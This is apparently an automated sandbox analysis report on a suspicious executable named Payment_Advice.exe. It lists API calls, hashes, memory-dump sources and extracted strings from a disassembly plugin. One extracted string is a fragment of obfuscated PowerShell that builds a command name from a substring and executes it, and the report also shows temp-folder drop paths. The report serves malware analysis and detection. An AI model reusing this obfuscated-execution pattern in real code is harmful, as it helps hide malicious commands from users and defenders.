Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
Instruction ID: 9dcfef7e452db0a7b9eae0ecc372c740654949990ed8f849d8faaf285a661dbe
Opcode Fuzzy Hash: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
Instruction Fuzzy Hash: 8BD012B2708100D7DB10DFA59A0899D77749B15325F700977E101F21D0D2B895519A2A

Function 00404179 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D

Function 00404162 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09

Function 0040330D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D

Function 0040414F Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69

Non-executed Functions

Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B26
GetDlgItem.USER32(?,00000408), ref: 00404B31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
LoadBitmapW.USER32(0000006E), ref: 00404B8E
SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
DeleteObject.GDI32(00000000), ref: 00404C04
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
ShowWindow.USER32(?,00000005), ref: 00404D5E
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
ImageList_Destroy.COMCTL32(?), ref: 00404F2E
GlobalFree.KERNEL32(?), ref: 00404F3E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
SendMessageW.USER32(?,00001102,?,?), ref: 00405060
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
ShowWindow.USER32(?,00000000), ref: 004050DD
GetDlgItem.USER32(?,000003FE), ref: 004050E8
ShowWindow.USER32(00000000), ref: 004050EF

Strings

M, xrefs: 00404CB8
, xrefs: 004050C7
N, xrefs: 00404D99

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
Opcode Fuzzy Hash: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58

Function 004045C8 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404617
SetWindowTextW.USER32(00000000,?), ref: 00404641
SHBrowseForFolderW.SHELL32(?), ref: 004046F2
CoTaskMemFree.OLE32(00000000), ref: 004046FD
lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 0040472F
lstrcatW.KERNEL32(?,: Completed), ref: 0040473B
SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D

Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment_Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Payment_Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206

GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF

Strings

';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", xrefs: 004045E1
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00404718
: Completed, xrefs: 00404729, 0040472E, 00404739
A, xrefs: 004046EB

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: ';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "$: Completed$A$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
API String ID: 2246997448-2698222531
Opcode ID: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
Opcode Fuzzy Hash: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69

Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD

Strings

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas, xrefs: 004020F5

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas
API String ID: 542301482-2435848561
Opcode ID: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
Opcode Fuzzy Hash: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55

Function 0040276E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
Opcode Fuzzy Hash: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A

Function 004042CA Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
GetDlgItem.USER32(?,000003E8), ref: 0040437C
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
GetSysColor.USER32(?), ref: 004043AA
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
lstrlenW.KERNEL32(?), ref: 004043CB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
GetDlgItem.USER32(?,0000040A), ref: 00404446
SendMessageW.USER32(00000000), ref: 0040444D
GetDlgItem.USER32(?,000003E8), ref: 00404478
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
SetCursor.USER32(00000000), ref: 004044CC
ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
SetCursor.USER32(00000000), ref: 004044F0
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531

Strings

N, xrefs: 00404466
open, xrefs: 004044D9
AB@, xrefs: 004044D6
: Completed, xrefs: 004044A7

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: : Completed$AB@$N$open
API String ID: 3615053054-1317861079
Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9

Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C16
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43

Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
wsprintfA.USER32 ref: 00405C7E
GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
GlobalFree.KERNEL32(00000000), ref: 00405D6F
CloseHandle.KERNEL32(00000000), ref: 00405D76

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

Strings

peB, xrefs: 00405C55
p]B, xrefs: 00405C0B
[Rename], xrefs: 00405CE8, 00405CFA
NUL, xrefs: 00405C10
%ls=%ls, xrefs: 00405C74

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
